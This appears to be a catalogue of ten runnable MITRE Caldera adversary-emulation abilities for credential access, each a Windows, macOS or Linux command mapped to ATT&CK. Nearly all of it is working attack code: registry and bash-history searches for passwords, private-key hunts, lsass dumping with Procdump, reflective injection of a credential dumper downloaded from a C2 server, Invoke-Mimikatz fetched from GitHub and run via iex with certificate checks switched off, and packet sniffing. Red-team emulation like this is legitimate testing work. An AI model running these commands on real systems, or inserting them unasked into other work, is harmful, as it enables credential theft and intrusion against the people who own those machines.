
Caldera emulation abilities

10 runnable adversary-emulation actions · command + platform · mapped to ATT&CK

Abilities

Credentials in Registry - HKCU
Search for possible credentials stored in the HKCU hive
[{"platform": "windows", "executor": "psh", "command": "reg query HKCU /f password /t REG_SZ /s\n"}]
Credentials in Registry - HKLM
Search for possible credentials stored in the HKLM Hive
[{"platform": "windows", "executor": "psh", "command": "reg query HKLM /f password /t REG_SZ /s\n"}]
credential-access [darwin, linux] T1552.003 · Unsecured Credentials: Bash History
Dump history
Get contents of bash history
[{"platform": "darwin", "executor": "sh", "command": "find ~/.bash_sessions -name '*' -exec cat {} \\; 2>/dev/null"}, {"platform": "linux", "executor": "sh", "command": "cat ~/.bash_history"}]
credential-access [windows, darwin, linux] T1552.004 · Unsecured Credentials: Private Keys
Find private keys
Find private keys on the file system
[{"platform": "windows", "executor": "psh", "command": "foreach($i in @(\".key\",\".pgp\",\".gpg\",\".ppk\",\".p12\",\".pem\",\".pfx\",\".cer\",\".p7b\",\".asc\",\".crt\")){Get-ChildItem -Path c:\\ -Depth 3 -File -Recurse -ErrorAction SilentlyContinue | Where-Object {$_.name -Match \"$i$\"}}\n"}, {"platform": "windows", "executor": "cmd", "command": "for %i in (\\.key \\.pgp \\.gpg \\.ppk \\.p12 \\.pem \\.pfx \\.cer \\.p7b \\.asc) do (dir c:\\ /b /s .key | findstr /e \"%i\")\n"}, {"platform": "darwin", "executor": "sh", "command": "for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /Users -maxdepth 3 -name \"*${i}\" 2>/dev/null;done;\n"}, {"platform": "linux", "executor": "sh", "command": "for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /etc -maxdepth 3 -name \"*${i}\" 2>/dev/null;done;"}]
Inject Cred dumper into process (Spookier)
Injects cred dumper exe into an available process
[{"platform": "windows", "executor": "psh", "command": "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"file\",\"debugger.dll\");\n$PBytes = $wc.DownloadData($url);\n$wc1 = New-Object System.net.webclient;\n$wc1.headers.add(\"file\",\"Invoke-ReflectivePEInjection.ps1\");\nIEX ($wc1.DownloadString($url));\nInvoke-ReflectivePEInjection -PBytes $PBytes -verbose"}]
Leverage Procdump for lsass memory
Dump lsass for later use with mimikatz
[{"platform": "windows", "executor": "psh", "command": "$ps_url = \"https://download.sysinternals.com/files/Procdump.zip\";\n$download_folder = \"C:\\Users\\Public\\\";\n$staging_folder = \"C:\\Users\\Public\\temp\";\nStart-BitsTransfer -Source $ps_url -Destination $download_folder;\nExpand-Archive -LiteralPath $download_folder\"Procdump.zip\" -DestinationPath $staging_folder;\n$arch=[System.Environment]::Is64BitOperatingSystem;\n\nif ($arch) {\n    iex $staging_folder\"\\procdump64.exe -accepteula -ma lsass.exe\" > $env:APPDATA\\error.dmp 2>&1;\n} else {\n    iex $staging_folder\"\\procdump.exe -accepteula -ma lsass.exe\" > $env:APPDATA\\error.dmp 2>&1;\n}\nremove-item $staging_folder -Recurse;\n"}]
credential-access [windows] T1003 · OS Credential Dumping
MiniDumpWriteDump (Spooky)
Custom Go credential dumper using MiniDumpWriteDump
[{"platform": "windows", "executor": "psh", "command": ".\\totallylegit.exe #{host.process.id} C:\\Users\\Public\\creds.dmp\n"}]
Powerkatz (Staged)
Use Invoke-Mimikatz
[{"platform": "windows", "executor": "psh", "command": "Import-Module .\\invoke-mimi.ps1;\nInvoke-Mimikatz -DumpCreds\n"}]
Run PowerKatz
Use powerkatz to execute mimikatz and attempt to grab plaintext and/or hashed passwords
[{"platform": "windows", "executor": "psh", "command": "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };\n$web = (New-Object System.Net.WebClient);\n$result = $web.DownloadString(\"https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1\");\niex $result; Invoke-Mimikatz -DumpCreds\n"}]
credential-access [windows, darwin] T1040 · Network Sniffing
Sniff network traffic
Perform a packet capture
[{"platform": "windows", "executor": "psh", "command": "$path = \"$ENV:UserProfile\\Desktop\\pcap.etl\";\nNew-NetEventSession -Name \"PCAP\" -CaptureMode SaveToFile -LocalFilePath $path;\nAdd-NetEventProvider -Name \"Microsoft-Windows-TCPIP\" -SessionName \"PCAP\";\nStart-NetEventSession -Name \"PCAP\";\nStart-Sleep -s 60;\nStop-NetEventSession -Name \"PCAP\";\nif (Test-Path $path) {\n  echo $path;\n  exit 0;\n} else {\n  echo \"Failed to generate PCAP file.\";\n  exit 1;\n};\n"}, {"platform": "darwin", "executor": "sh", "command": "tcpdump -i en0 & sleep 5; kill $!\n"}]